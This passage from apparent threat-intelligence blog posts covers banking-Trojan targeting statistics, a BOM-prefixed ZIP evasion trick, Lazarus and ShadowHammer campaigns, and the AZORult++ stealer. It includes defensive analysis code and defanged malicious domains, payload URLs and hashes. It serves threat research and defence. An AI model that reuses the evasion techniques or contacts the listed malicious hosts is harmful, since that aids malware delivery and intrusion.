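    """Extract the host part of a target mask such as '*example-bank.com/login*'.
    Returns None when the mask carries no host (e.g. '* bank *')."""
    m = mask.strip().strip("* ").strip()
    if "://" not in m:
        m = "http://" + m                 # let urlsplit see a netloc
    host = (urlsplit(m).hostname or "").strip("*.")
    if "*" in host or "." not in host:
        return None
    return host.lower()


def country_for_domain(host: str):
    """ccTLD decides the country; for generic TLDs fall back to the HQ lookup."""
    tld = host.rsplit(".", 1)[-1]
    if tld in CCTLD_COUNTRY:
        return CCTLD_COUNTRY[tld]
    for name, country in HQ_COUNTRY.items():
        if host == name or host.endswith("." + name):
            return country
    return None


def unique_attacks(commands):
    """Set of (mask, family) pairs with an identifiable target."""
    return {(mask, family) for family, mask in commands
            if domain_from_mask(mask) is not None}


def country_breakdown(commands):
    """Number of unique attacks per attributed country."""
    counts = {}
    for mask, _family in unique_attacks(commands):
        country = country_for_domain(domain_from_mask(mask))
        if country:
            counts[country] = counts.get(country, 0) + 1
    return counts


if __name__ == "__main__":
    print(len(unique_attacks(SAMPLE_COMMANDS)), country_breakdown(SAMPLE_COMMANDS))
```

Of the six constructed commands only four count as unique attacks: the repeated command collapses into one, the same mask under a second family counts separately, and the “* bank *” mask is discarded because no host can be recovered from it.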

In 2018, the ranking of Top 10 countries by number of unique target masks changed order, but not composition. As in the previous year, clients of organizations in the US were the most frequent targets of attacks in 2018.

        2017                       2018
  1     United States   31.29%     United States   34.84%
  2     Germany         11.15%     Britain          9.97%
  3     Britain          9.20%     Italy            7.46%
  4     Italy            7.52%     Canada           6.16%
  5     Canada           6.96%     Germany          3.88%
  6     Australia        4.67%     Spain            3.14%
  7     France           4.57%     Switzerland      3.04%
  8     Spain            2.87%     France           3.02%
  9     China            2.50%     Australia        2.29%
 10     Switzerland      2.17%     China            2.11%

In 2018, the share of unique attacks on clients of organizations located in Germany fell significantly. This is because in 2017 most of these attacks were carried out by BetaBot (almost 75% of all registered unique attacks), while in 2018 its share barely exceeded 1.5%. Even with Danabot attacks registered in 2018 on clients of German banks, Germany still couldn’t retain second place in our ranking.

Geography of attack targets, 2017

Among the other changes observed was a decline in the share of attacked clients of Australian organizations from 4.67% to 2.29%. Almost all bots reduced the number of unique masks focused on Australia. For instance, among the Gozi banker attacks we observed in 2018, there were practically none against clients of financial organizations in Australia, whereas in 2017 they accounted for more than 90% of registered attacks by this malware.

Geography of attack targets, 2018

But it’s not all good news. Many varieties of malware expanded their geography: In 2018, the Trickster (TrickBot) banker added no fewer than 11 countries to its target list, while the SpyEye Trojan and the IcedID banker picked up 9 and 5 more countries, respectively.

Unsurprisingly, the most frequently attacked users of cryptocurrency services were located in the US, Luxembourg, and China, since many cryptocurrency services are registered in these countries. In addition, the number of attacks in 2018 on users of services registered in Britain, Singapore, Estonia, South Korea, and Switzerland climbed significantly.

Geography of cryptocurrency services whose users were attacked, 2017

Geography of cryptocurrency services whose users were attacked, 2018

Geography of C&C centers

This section gives statistics on the geography of botnet C&C centers that sent commands to launch an attack.

In 2017, the largest slice of C&C centers was located in Ukraine (24.25%), with almost 60% of them made up of C&C servers for the abovementioned Gozi banker.

Geography of C&C centers in 2017

In 2018, Russia (29.61%) was top of the leaderboard by number of C&C centers directing attacks against clients of various organizations. More than half (54%) of these C&C centers were used by the Panda banker.

Geography of C&C centers, 2018

Most active families

BetaBot

Trojan Banker BetaBot accounted for 13.25% of all unique attacks in 2018.

Geography of BetaBot targets, 2018

Key features (shares relative to the number of unique BetaBot attacks):

  • Geography of targets: 42 countries
  • Most attacked countries: US (73.60%), China (6.35%), Britain (6.11%)
  • Most attacked categories of organizations: Financial Services (37.43%), Global Portals and Social Networks (18.16%)

Trickster (TrickBot)

The TrickBot banker accounted for 12.85% of all unique attacks in 2018.

Geography of TrickBot targets, 2018

Key features (shares relative to the number of unique TrickBot attacks):

  • Geography of targets: 65 countries
  • Most attacked countries: Britain (11.02%), US (9.34%), Germany (7.99%)
  • Most attacked categories of organizations: Financial Services (96.97%), Cryptocurrency Services (1.72%)

Panda

The Panda banker accounted for 9.84% of all unique attacks in 2018.

Geography of Panda targets, 2018

Key features (shares relative to the number of unique Panda attacks):

  • Geography of targets: 33 countries
  • Most attacked countries: Canada (24.89%), US (22.93%), Italy (17.90%)
  • Most attacked categories of organizations: Financial Services (80.88%), Cryptocurrency Services (10.26%)

SpyEye

SpyEye accounted for 8.05% of all unique attacks in 2018.

Geography of SpyEye targets, 2018

Key features (shares relative to the number of unique SpyEye attacks):

  • Geography of targets: 32 countries
  • Most attacked countries: US (35.01%), Britain (14.38%), Germany (13.57%)
  • Most attacked categories of organizations: Financial Services (98.04%)

Ramnit

Ramnit accounted for 7.97% of all unique attacks in 2018 registered by Botnet Monitoring. Ramnit’s impressive geography covers 66 countries.

Geography of Ramnit targets, 2018

Key features (shares relative to the number of unique Ramnit attacks):

  • Geography of targets: 66 countries
  • Most attacked countries: Britain (25.70%), US (20.12%), China (7.78%)
  • Most attacked categories of organizations: Financial Services (47.76%), Cryptocurrency Services (46.83%)

Our analysis of commands issued to attack clients of organizations in 2018 identified the following main trends:

  • The reduction in the total number of registered unique attacks may indicate cybercriminals’ preference to create target masks that cover a large number of resources of one organization and stay relevant for a prolonged period.
  • The absolute majority of attacks still target financial organizations and their clients.
  • The number of attacks on clients of cryptocurrency services increased significantly (compared to 2017). The number of such attacks is not expected to fall; on the contrary, it may rise given that more and more bots are deploying web injections against such resources.
  • New target masks are proliferating. Cybercriminals are adding new, previously unencountered targets as well as modifying old masks to cover more websites where user data or money can be stolen.

The return of the BOM

28 March, 2019 - 16:00

There’s nothing new in Brazilian cybercriminals trying out new ways to stay under the radar. It’s just that this time around the bad guys have started using a method that was reported in the wild years ago.

Russian gangs used this technique to distribute malware capable of modifying the hosts file on Windows systems. As McAfee reported in 2013, the additional UTF-8 BOM (Byte Order Mark) bytes helped these malicious crews avoid detection.

Since these campaigns depended on spear phishing to increase the victim count, the challenge was to fool email scanners and use a seemingly corrupted file that lands in the victim’s inbox.

The first indicator appears when the user tries to open the ZIP file with the default file explorer and sees the following error:

The error message suggests the file is corrupt, but when we check its contents we see something strange in there.

Zip header prefixed by UTF-8 BOM

Instead of having the normal ZIP header starting with the “PK” signature (0x504B), we have three extra bytes (0xEFBBBF) that represent the Byte Order Mark (BOM) usually found at the start of UTF-8 text files. Some tools will not recognize this file as a ZIP archive, but will instead treat it as a UTF-8 text file and fail to extract the malicious payload.

However, utilities such as WinRAR and 7-Zip ignore this data and extract the content correctly. Once the user extracts the file with any of these utilities they can execute it and infect the system.
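The mismatch between a strict magic-byte check and a tolerant extractor is easy to reproduce. The Python block below is an added example, not code from the original post: it builds a constructed, harmless archive, prefixes it with the UTF-8 BOM, shows that a scanner trusting only the first bytes rejects it, and shows that the archive still extracts once the three BOM bytes are skipped, which is the tolerant behaviour the post attributes to WinRAR and 7-Zip. The `classify` function is the check a defender can put in front of an archive scanner to flag this specific disguise.

```python
import io
import zipfile

UTF8_BOM = b"\xef\xbb\xbf"          # 0xEFBBBF, the UTF-8 Byte Order Mark
ZIP_LOCAL_HEADER = b"PK\x03\x04"    # "PK" (0x504B) plus the local file header tag
ZIP_EMPTY_ARCHIVE = b"PK\x05\x06"   # end-of-central-directory only (empty ZIP)


def naive_is_zip(data: bytes) -> bool:
    """What a strict scanner does: trust only the very first bytes."""
    return data.startswith((ZIP_LOCAL_HEADER, ZIP_EMPTY_ARCHIVE))


def classify(data: bytes) -> str:
    """Return 'zip', 'bom-zip', 'utf8-text' or 'unknown'.
    'bom-zip' is the suspicious case: a text-file marker sitting in front of a
    ZIP header, which a tolerant extractor would still open."""
    if naive_is_zip(data):
        return "zip"
    if data.startswith(UTF8_BOM):
        return "bom-zip" if naive_is_zip(data[len(UTF8_BOM):]) else "utf8-text"
    return "unknown"


def member_names(data: bytes) -> list:
    """List archive members, skipping a leading BOM the way tolerant
    extractors do, so the scanner sees the same content the user will."""
    if data.startswith(UTF8_BOM):
        data = data[len(UTF8_BOM):]
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        return zf.namelist()


def build_sample() -> bytes:
    """Constructed sample for this example: a one-file archive with a BOM in front."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("readme.txt", "harmless placeholder content")
    return UTF8_BOM + buf.getvalue()


if __name__ == "__main__":
    sample = build_sample()
    print(classify(sample), naive_is_zip(sample), member_names(sample))
```

A scanner that classifies a file as text on the strength of the BOM alone, and stops there, never looks at the archive the user is about to extract; checking for a ZIP signature immediately after the BOM closes that gap.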

The file is successfully extracted by WinRAR

The malicious executable acts as a loader for the main payload which is embedded in the resource section.

Resource table showing the resource containing the encrypted data

Encrypted DLL stored in resource section

The content stored inside the resource is encrypted with an XOR-based algorithm commonly seen in different malware samples from Brazil. The decrypted resource is a DLL that will load and execute the exported function “BICDAT”.

Code used to load the extracted DLL and execute the exported function BICDAT

This library will then download a second-stage payload, a password-protected ZIP file encrypted with the same function as the embedded payload. After extracting all the files, the loader will then launch the main executable.

Code executed by BICDAT function

Strings related to Banking RAT malware

The final payload that’s delivered is a variant of a Banking RAT malware, which is currently widespread in Brazil and Chile.

Kaspersky Lab products can extract and analyze compressed ZIP files containing the Byte Order Mark without any problem.

Indicators of compromise


Threat Landscape for Industrial Automation Systems in H2 2018

27 March, 2019 - 12:00

H2 2018 in figures

All statistical data used in this report was collected using the Kaspersky Security Network (KSN), a distributed antivirus network. The data was received from those KSN users who gave their consent to have data anonymously transferred from their computers. We do not identify the specific companies/organizations sending statistics to KSN, due to the product limitations and regulatory restrictions.

In H2 2018:

  • Kaspersky Lab products prevented malicious activity on 40.8% of ICS computers.
  • Kaspersky Lab security solutions detected over 19.1 thousand malware modifications from 2.7 thousand different families on industrial automation systems. As before, in the overwhelming majority of cases, attempted infections of ICS computers are random rather than parts of targeted attacks.
  • Trojan malware remains the most prevalent among threats that are relevant to ICS computers. Malware of this class was detected on 27.1% of ICS computers. The malicious activity of exploits was prevented on 3.2% of ICS computers, backdoors were blocked on 3.1%, and ransomware on 2% of ICS computers.

Percentage of ICS computers on which malicious objects of different classes were prevented, 2017 – 2018

  • In each month of 2018, the proportion of ICS computers on which malicious activity was prevented was higher than that in the same month of 2017.

Percentage of ICS computers on which malicious objects were detected

  • Countries with the highest proportions of ICS computers on which malicious objects were detected during H2 2018 were Vietnam (70.1%), Algeria (69.9%), and Tunisia (64.6%).
  • The most secure countries are Ireland (11.7%), Switzerland (14.9%), Denmark (15.2%), Hong Kong (15.3%), the UK (15.7%), and the Netherlands (15.7%).

Percentage of ICS computers on which malicious objects were detected in different countries of the world

  • As in the past years, the main sources of threats to computers in the industrial infrastructure of organizations are the internet (26.1%), removable media (8.3%), and email (4.9%).

Percentage of ICS computers on which malicious objects from different sources were detected

  • The percentage of ICS computers on which malicious email attachments were blocked has increased in nearly all regions of the world. This change probably reflects the growth in the number of phishing attacks on industrial enterprises in H2 2018.

Percentage of ICS computers on which malicious email attachments were blocked in different regions of the world

  • Phishing attacks are the main vector of targeted attacks on industrial companies. Malicious attachments from phishing emails pose a danger not only to office computers but also to some of the computers in the industrial infrastructure: Trojan-spy, backdoor and keylogger malware was blocked on at least 4.3% of ICS computers globally. All of these types of malware often show up in the phishing emails sent to industrial enterprises.
  • Western Europe (5.1%) is, surprisingly, one of the TOP 3 regions based on the percentage of ICS computers on which malicious email attachments were blocked. This is in large part due to the percentage for Germany nearly doubling (from 3.6% to 6.5%).

Vulnerabilities identified by Kaspersky Lab ICS CERT in 2018

Kaspersky Lab ICS CERT experts continued the previous year’s research on security issues affecting third-party hardware-based and software solutions that are widely used in industrial automation systems. A particular emphasis was placed on open-source products used in various vendors’ solutions. Analyzing car software for vulnerabilities became a new area of research for Kaspersky Lab ICS CERT.

  • In 2018, Kaspersky Lab ICS CERT identified 61 vulnerabilities in industrial and IIoT/IoT systems. Vendors closed 29 of these vulnerabilities during the year.

Distribution of vulnerabilities identified by Kaspersky Lab ICS CERT in 2018 by types of components analyzed

  • 46% of the vulnerabilities identified, if exploited, could lead to remote execution of arbitrary code on the target system or a denial-of-service (DoS) condition. A significant part of the vulnerabilities (21%) could also enable an attacker to bypass authentication.

Distribution of vulnerabilities identified by Kaspersky Lab ICS CERT in 2018 by possible exploitation consequences

  • During 2018, 37 CVE entries were published based on information about vulnerabilities identified by Kaspersky Lab ICS CERT (information on 15 vulnerabilities closed in 2018 had been provided to vendors in 2017).
  • The absolute majority of those vulnerabilities identified by Kaspersky Lab ICS CERT for which CVEs were published in 2018 have CVSS v.3 base scores of 7.0 or more, which places them in the most severe group. Seven of these vulnerabilities were assigned the highest possible base score of 10. These include vulnerabilities in third-party software, and LibVNCServer and LibVNCClient cross-platform solutions.

You can find information on the key events of H2 2018, an overview of vulnerabilities published during the year, and detailed statistics in the full version of the report on the Kaspersky Lab ICS CERT website.

Cryptocurrency businesses still being targeted by Lazarus

26 March, 2019 - 16:00

It’s hardly news to anyone who follows cyberthreat intelligence that the Lazarus APT group targets financial entities, especially cryptocurrency exchanges. Financial gain remains one of the main goals for Lazarus, with its tactics, techniques, and procedures constantly evolving to avoid detection.

In the middle of 2018, we published our Operation Applejeus research, which highlighted Lazarus’s focus on cryptocurrency exchanges utilizing a fake company with a backdoored product aimed at cryptocurrency businesses. One of the key findings was the group’s new ability to target macOS. Since then Lazarus has been busy expanding its operations for the platform.

Further tracking of their activities targeting the financial sector enabled us to discover a new operation, active since at least November 2018, which utilizes PowerShell to control Windows systems and macOS malware for Apple users.

Infection procedure

Lazarus is a well-organized group, something that can be seen from its malware population: not only have we seen the group build in redundancy, keeping reserve malware as a hot spare to replace ‘burnt’ (detected) samples during an operation, but it also conforms to specific internal standards and protocols when developing backdoors. This case is no different. The group has developed custom PowerShell scripts that communicate with malicious C2 servers and execute commands from the operator. The C2 server script names are disguised as files of WordPress (a popular blog engine) and of other popular open-source projects. After the malware control session with the server is established, the functionality provided by the malware includes:

  • Set sleep time (delay between C2 interactions)
  • Exit malware
  • Collect basic host information
  • Check malware status
  • Show current malware configuration
  • Update malware configuration
  • Execute system shell command
  • Download & Upload files

Lazarus uses different tactics to run its C2 servers: from purchasing servers to using hacked ones. We have seen some legitimate-looking servers that are most likely compromised and used in malicious campaigns. According to server response headers, they are most likely running an old vulnerable instance of Internet Information Services (IIS) 6.0 on Microsoft Windows Server 2003. Another C2 server was probably purchased by Lazarus from a hosting company and used to host macOS and Windows payloads. The geography of the servers varies, from China to the European Union. But why use two different types of servers? The group seems to have a rule (at least in this campaign) to only host malware on rented servers, while hosting C2 scripts for malware communication on compromised servers.

Infrastructure segregation by purpose

The malware was distributed via documents carefully prepared to attract the attention of cryptocurrency professionals. Seeing as how some of the documents were prepared in Korean, we believe that South Korean businesses are a high priority for Lazarus. One document entitled ‘Sample document for business plan evaluation of venture company’ (translated from Korean) looks like this:

Content of weaponized document from Lazarus (4cbd45fe6d65f513447beb4509a9ae3d)

Another macro-weaponized document (e9a6a945803722be1556fd120ee81199) contains a business overview of what seems to be a Chinese technology consulting group named LAFIZ. We couldn’t confirm if it’s a legitimate business or another fake company made up by Lazarus. Their website lafiz[.]link has been parked since 2017.

Contents of another weaponized document (e9a6a945803722be1556fd120ee81199)

Based on our telemetry, we found a cryptocurrency exchange company attacked with a malicious document containing the same macro. The document’s content provided information for coin listings with a translation in Korean:

Content of another weaponized document (6a0f3abd05bc75edbfb862739865a4cc)

The payloads show that Lazarus keeps exploring more ways to evade detection to stay under the radar longer. The group builds malware for 32-bit and 64-bit Windows separately to support both platforms and have more variety in terms of compiled code. The Windows payloads distributed from the server (nzssdm[.]com) hosting the Mac malware have a CheckSelf export function, and one of them (668d5b5761755c9d061da74cb21a8b75) has the internal name ‘battle64.dll’. From that point we managed to find additional Windows malware samples containing the CheckSelf export function and an internal name containing the word ‘battle’.

These Windows malware samples were delivered using malicious HWP (Korean Hangul Word Processor format) documents exploiting a known PostScript vulnerability. It should be noted that HWP documents are only popular among Korean users (Hangul Word Processor was developed in South Korea) and we have witnessed several attacks using the same method.

Connection with previous HWP attacks

It’s no secret that Apple products are now very popular among successful internet startups and fintech companies, and this is why the malicious actor built and used macOS malware. While investigating earlier Lazarus incidents, we anticipated this actor would eventually expand its attacks to macOS.

It appears that Lazarus is using the same developers to expand to other platforms, because some of the features have remained consistent as its malware evolves.

Overlap of current campaign and previous hwp-based attack cases

We’d therefore like to ask Windows and macOS users to be more cautious and not fall victim to Lazarus. If you’re part of the booming cryptocurrency or technological startup industry, exercise extra caution when dealing with new third parties or installing software on your systems. It’s best to check new software with an antivirus or at least use popular free virus-scanning services such as VirusTotal. And never ‘Enable Content’ (macro scripting) in Microsoft Office documents received from new or untrusted sources. Avoid being infected by fake or backdoored software from Lazarus – if you need to try out new applications, it’s better to do so offline or in an isolated-network virtual machine which you can erase with a few clicks. We’ll continue posting on Lazarus’s latest tactics and tricks in our blog. In the meantime, stay safe!

For more details on this and other research, please contact intelreports@kaspersky.com.

File Hashes:

Malicious office document used in real attack
4cbd45fe6d65f513447beb4509a9ae3d 샘플_기술사업계획서(벤처기업평가용).doc
6a0f3abd05bc75edbfb862739865a4cc 문의_Evaluation Table.xls

Testing office document
29a37c6d9fae5664946c6607f351a8dc list.doc
e9a6a945803722be1556fd120ee81199 list.doc
a18bc8bc82bca8245838274907e64631 list.doc

macOS malware

PowerShell script
cb713385655e9af0a2fc10da5c0256f5 test.ps1
e6d5363091e63e35490ad2d76b72e851 test.ps1 – It does not contain URLs.

Windows executable payload
171b9135540f89bf727b690b9e587a4e wwtm.dat
668d5b5761755c9d061da74cb21a8b75 wwtm.dat

Manuscrypt payload

Malicious hwp file
F392492ef5ea1b399b4c0af38810b0d6 일일동향보고_180913.hwp
0316f6067bc02c23c1975d83c659da21 국가핵심인력등록관리제등검토요청(10.16)(김경환변호사).hwp

Domains and IPs

Compromised first stage C2 server

Second stage C2 server
http://115.28.160[.]20:443 – Compromised server

Malware hosting server
http://nzssdm[.]com/assets/wwtm.dat – Windows payload distribution URL
http://nzssdm[.]com/assets/mt.dat – Mac payload distribution URL

Operation ShadowHammer

25 March, 2019 - 15:01

Earlier today, Motherboard published a story by Kim Zetter on Operation ShadowHammer, a newly discovered supply chain attack that leveraged ASUS Live Update software.

While the investigation is still in progress and the full results and technical paper will be published at the SAS 2019 conference in Singapore, we would like to share some important details about the attack.

In January 2019, we discovered a sophisticated supply chain attack involving the ASUS Live Update Utility. The attack took place between June and November 2018 and according to our telemetry, it affected a large number of users.

ASUS Live Update is a utility that is pre-installed on most ASUS computers and is used to automatically update certain components such as BIOS, UEFI, drivers and applications. According to Gartner, ASUS is the world’s 5th-largest PC vendor by 2017 unit sales. This makes it an extremely attractive target for APT groups that might want to take advantage of its user base.

Based on our statistics, over 57,000 Kaspersky users have downloaded and installed the backdoored version of ASUS Live Update at some point in time. We are not able to calculate the total count of affected users based only on our data; however, we estimate that the real scale of the problem is much bigger and is possibly affecting over a million users worldwide.

The goal of the attack was to surgically target an unknown pool of users, which were identified by their network adapters’ MAC addresses. To achieve this, the attackers had hardcoded a list of MAC addresses in the trojanized samples and this list was used to identify the actual intended targets of this massive operation. We were able to extract more than 600 unique MAC addresses from over 200 samples used in this attack. Of course, there might be other samples out there with different MAC addresses in their list.

We believe this to be a very sophisticated supply chain attack, which matches or even surpasses the Shadowpad and the CCleaner incidents in complexity and techniques. The reason that it stayed undetected for so long is partly due to the fact that the trojanized updaters were signed with legitimate certificates (e.g. “ASUSTeK Computer Inc.”). The malicious updaters were hosted on the official liveupdate01s.asus[.]com and liveupdate01.asus[.]com ASUS update servers.

Digital signature on a trojanized ASUS Live Update setup installer
Certificate serial number: 05e6a0be5ac359c7ff11f4b467ab20fc

We have contacted ASUS and informed them about the attack on Jan 31, 2019, supporting their investigation with IOCs and descriptions of the malware.

Although precise attribution is not available at the moment, certain evidence we have collected allows us to link this attack to the ShadowPad incident from 2017. The actor behind the ShadowPad incident has been publicly identified by Microsoft in court documents as BARIUM. BARIUM is an APT actor known to be using the Winnti backdoor. Recently, our colleagues from ESET wrote about another supply chain attack in which BARIUM was also involved, that we believe is connected to this case as well.

A victim distribution by country for the compromised ASUS Live Updater looks as follows:

It should be noted that the numbers are also highly influenced by the distribution of Kaspersky users around the world. In principle, the distribution of victims should match the distribution of ASUS users around the world.

We’ve also created a tool which can be run to determine if your computer has been one of the surgically selected targets of this attack. To check this, it compares the MAC addresses of all adapters to a list of predefined values hardcoded in the malware and alerts if a match is found.
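The kind of self-check the tool performs can be sketched in a few lines. The Python below is an added example and is not Kaspersky’s tool nor the malware’s list: the target list is a constructed placeholder (the real MAC addresses are not reproduced here), the adapter enumeration reads the Linux sysfs path `/sys/class/net` and returns nothing elsewhere, and the point of the example is the normalization step, since a naive string comparison would miss the same address written with dashes, colons or Cisco-style dots.

```python
import os
import re

# Constructed placeholder list for this example, NOT the addresses from the malware.
HYPOTHETICAL_TARGET_MACS = ["00-11-22-33-44-55", "aabb.ccdd.eeff"]

_HEX12 = re.compile(r"^[0-9a-f]{12}$")


def normalize_mac(mac: str):
    """Canonical lowercase 'aa:bb:cc:dd:ee:ff' form. Accepts colon, dash and
    Cisco dotted notations; returns None for anything that is not a 48-bit MAC."""
    digits = re.sub(r"[^0-9a-fA-F]", "", mac).lower()
    if not _HEX12.match(digits):
        return None
    return ":".join(digits[i:i + 2] for i in range(0, 12, 2))


def local_macs_linux():
    """Enumerate adapter MAC addresses from sysfs (Linux only). The all-zero
    loopback address is skipped; on other platforms the list is empty."""
    macs = []
    base = "/sys/class/net"
    if not os.path.isdir(base):
        return macs
    for iface in sorted(os.listdir(base)):
        try:
            with open(os.path.join(base, iface, "address")) as f:
                mac = normalize_mac(f.read().strip())
        except OSError:
            continue
        if mac and mac != "00:00:00:00:00:00":
            macs.append(mac)
    return macs


def find_matches(local_macs, target_macs):
    """Sorted list of local addresses that appear in the target list, compared
    in canonical form so notation differences cannot hide a match."""
    wanted = {m for m in (normalize_mac(t) for t in target_macs) if m}
    return sorted({m for m in (normalize_mac(l) for l in local_macs) if m and m in wanted})


if __name__ == "__main__":
    hits = find_matches(local_macs_linux(), HYPOTHETICAL_TARGET_MACS)
    print("match found:" if hits else "no match", hits)
```

Because the attackers selected victims by adapter address rather than by anything an AV verdict would show, a host that installed the backdoored updater but is not on the list looks no different from one that was; the comparison above is the only local signal, which is why the post also offers the online lookup.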

Download an archive with the tool (.exe)

Also, you may check MAC addresses online. If you discover that you have been targeted by this operation, please e-mail us at: shadowhammer@kaspersky.com


Kaspersky Lab verdicts for the malware used in this and related attacks:

  • HEUR:Trojan.Win32.ShadowHammer.gen

Domains and IPs:

  • asushotfix[.]com
  • 141.105.71[.]116

Some of the URLs used to distribute the compromised packages:

  • hxxp://liveupdate01.asus[.]com/pub/ASUS/nb/Apps_for_Win8/LiveUpdate/Liveupdate_Test_VER365.zip
  • hxxps://liveupdate01s.asus[.]com/pub/ASUS/nb/Apps_for_Win8/LiveUpdate/Liveupdate_Test_VER362.zip
  • hxxps://liveupdate01s.asus[.]com/pub/ASUS/nb/Apps_for_Win8/LiveUpdate/Liveupdate_Test_VER360.zip
  • hxxps://liveupdate01s.asus[.]com/pub/ASUS/nb/Apps_for_Win8/LiveUpdate/Liveupdate_Test_VER359.zip

Hashes (Liveupdate_Test_VER365.zip):

  • aa15eb28292321b586c27d8401703494
  • bebb16193e4b80f4bc053e4fa818aa4e2832885392469cd5b8ace5cec7e4ca19

A full set of IOCs and Yara rules is available to customers of Kaspersky Intelligence Reporting service – contact intelreports@kaspersky.com

AZORult++: Rewriting history

22 March, 2019 - 13:13

The AZORult Trojan is one of the most commonly bought and sold stealers on Russian forums. Despite the relatively high price tag ($100), buyers like AZORult for its broad functionality (for example, the use of .bit domains as C&C servers to ensure owner anonymity and to make it difficult to block the C&C server), as well as its high performance. Many forum commenters recommend it.

But at the end of 2018, the main seller, known under the handle CrydBrox, stopped selling the malware:

“All software has a shelf life. It’s run out for AZORult.
It is with joy and sadness that I announce that sales are closed forever.”

Some attribute the move to AZORult 3.2 having become too widely available, as had the source code of the botnet control panel. This version of the malware spread to other forums where even users without special skills can download and configure it for their own purposes. So the imminent demise of AZORult was apparently down to a lack of regular updates and its overly wide distribution. Yet the story of AZORult does not end there.

In a nutshell

AZORult is a Trojan stealer that collects various data on infected computers and sends it to the C&C server, including browser history, login credentials, cookies, files from folders as specified by the C&C server (for example, all TXT files from the Desktop folder), cryptowallet files, etc.; the malware can also be used as a loader to download other malware. Kaspersky Lab products detect the stealer as Trojan-PSW.Win32.Azorult. Our statistics show that since the start of 2019, users in Russia and India are the most targeted.

Geography of users attacked by Trojan-PSW.Win32.Azorult, 01.01.2019 — 03.18.2019

From Delphi to C++

In early March 2019, a number of malicious files detected by our products caught the eye. Although similar to AZORult already known to us, unlike the original malware, they were written not in Delphi, but in C++. A clear hint at the link between them comes from a section of code left by the developer.

It appears that the acolytes of CrydBrox, the very one who pulled the plug on AZORult, decided to rewrite it in C++; this version we call AZORult++. The presence of lines containing a path to debugging files likely indicates that the malware is still in development, since developers usually try to remove such code as soon as feasible.

AZORult++ starts out by checking the language ID through a call to the GetUserDefaultLangID() function. If AZORult++ is running on a system where the language is identified as Russian, Armenian, Azerbaijani, Belarusian, Georgian, Kazakh, Tajik, Turkmen, or Uzbek, the malware stops executing.

A more detailed analysis reveals that the C++ version is deficient compared to AZORult 3.3, the last iteration to be sold. In particular, there is no loader functionality and no support for stealing saved passwords from many of the browsers supported by AZORult 3.3. At the same time, many signature features of the Delphi-based version 3.3 are present in AZORult++, including the algorithm for communication with the C&C server, the command format, the structure and method of storing harvested data, and encryption keys.

Like AZORult 3.3, AZORult++ uses an XOR operation with a 3-byte key to encrypt data sent to the C&C server. What’s more, this key we had already encountered in various modifications of version 3.3.

Examples of different versions of AZORult in operation (data encrypted using XOR)
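The repeating 3-byte XOR described above is weak enough that an analyst holding a capture of the C&C traffic can recover the key from a few bytes of known plaintext. The following is an added example written for this article, not code from the AZORult analysis: it assumes a constructed placeholder key (0x11 0x22 0x33, not the key the researchers observed) and a constructed bot-ID message with a known "BOTID" prefix, recovers the key from that prefix and decrypts the rest of the message.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>
#include <stdio.h>

#define AZ_KEY_LEN 3

/* Apply a repeating 3-byte XOR key in place; XOR is its own inverse, so the
 * same call encrypts and decrypts. */
void xor3_apply(uint8_t *buf, size_t len, const uint8_t key[AZ_KEY_LEN])
{
    for (size_t i = 0; i < len; i++)
        buf[i] ^= key[i % AZ_KEY_LEN];
}

/* Recover the key from a captured message when at least three consecutive
 * plaintext bytes starting at `offset` are known (a fixed field such as the
 * bot-ID prefix). Extra known bytes are used to confirm the key. Returns 0
 * on success, -1 if too little plaintext, -2 if the known bytes disagree. */
int xor3_recover_key(const uint8_t *cipher, size_t offset, const uint8_t *known_plain,
                     size_t known_len, uint8_t key_out[AZ_KEY_LEN])
{
    if (known_len < AZ_KEY_LEN) return -1;
    for (size_t i = 0; i < AZ_KEY_LEN; i++)
        key_out[(offset + i) % AZ_KEY_LEN] = cipher[offset + i] ^ known_plain[i];
    for (size_t i = AZ_KEY_LEN; i < known_len; i++)
        if ((cipher[offset + i] ^ key_out[(offset + i) % AZ_KEY_LEN]) != known_plain[i])
            return -2;
    return 0;
}

/* Constructed demo key: a placeholder, not the key the post refers to. */
const uint8_t DEMO_KEY[AZ_KEY_LEN] = { 0x11, 0x22, 0x33 };
const char DEMO_PLAINTEXT[] = "BOTID-PLACEHOLDER|user|WIN10";   /* constructed sample */

/* Encrypt the constructed message (what a capture would contain), recover the
 * key from the known "BOTID" prefix and decrypt. Returns 1 on success. */
int demo_recover_and_decrypt(uint8_t key_out[AZ_KEY_LEN], char *plain_out, size_t plain_cap)
{
    uint8_t pkt[64];
    size_t len = strlen(DEMO_PLAINTEXT);
    if (len > sizeof pkt || len + 1 > plain_cap) return 0;
    memcpy(pkt, DEMO_PLAINTEXT, len);
    xor3_apply(pkt, len, DEMO_KEY);                    /* "captured" ciphertext */

    if (xor3_recover_key(pkt, 0, (const uint8_t *)"BOTID", 5, key_out) != 0) return 0;

    xor3_apply(pkt, len, key_out);                     /* decrypt with recovered key */
    memcpy(plain_out, pkt, len);
    plain_out[len] = '\0';
    return strcmp(plain_out, DEMO_PLAINTEXT) == 0;
}

int main(void)
{
    uint8_t key[AZ_KEY_LEN];
    char plain[64];
    if (!demo_recover_and_decrypt(key, plain, sizeof plain)) return 1;
    printf("key: %02x %02x %02x\nplaintext: %s\n", key[0], key[1], key[2], plain);
    return 0;
}
```

Because the key repeats every three bytes, any three consecutive known plaintext bytes anywhere in the stream are enough; the remaining known bytes only serve as a consistency check, which is what makes the same key reusable across the captured traffic of different samples.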

The malware collects stolen data in RAM and does not write to the hard drive to keep its actions hidden. A comparison of the data sent in the first packet (the ID of the infected device) shows that AZORult++ uses a shorter string than AZORult 3.3 for identification:

The server response also contains far less data. In version 3.3, the response contained a command in the form “++++-+--+-“, specifying the bot configuration and a link for downloading additional malware, plus several binary files needed for the stealer to work. The string “++++-+--+-” is parsed by the Trojan character-by-character; “+” in a specific position signifies a command to execute certain actions (for example, harvesting of cryptowallet files). The current version of AZORult++ employs a shorter, yet similar command:

It is worth mentioning separately that the resulting configuration string is not processed correctly; the code execution does not depend on the value “+” or “-” in the string, since the characters are checked against \x00 for a match. In other words, the resulting command does not affect the stealer’s behavior:

This seems to be an error on the part of the developer, which suggests again that the project is in the very early stages of development. Going forward, these bugs are expected to be eliminated and the functionality of AZORult++ expanded.

++ up the sleeve

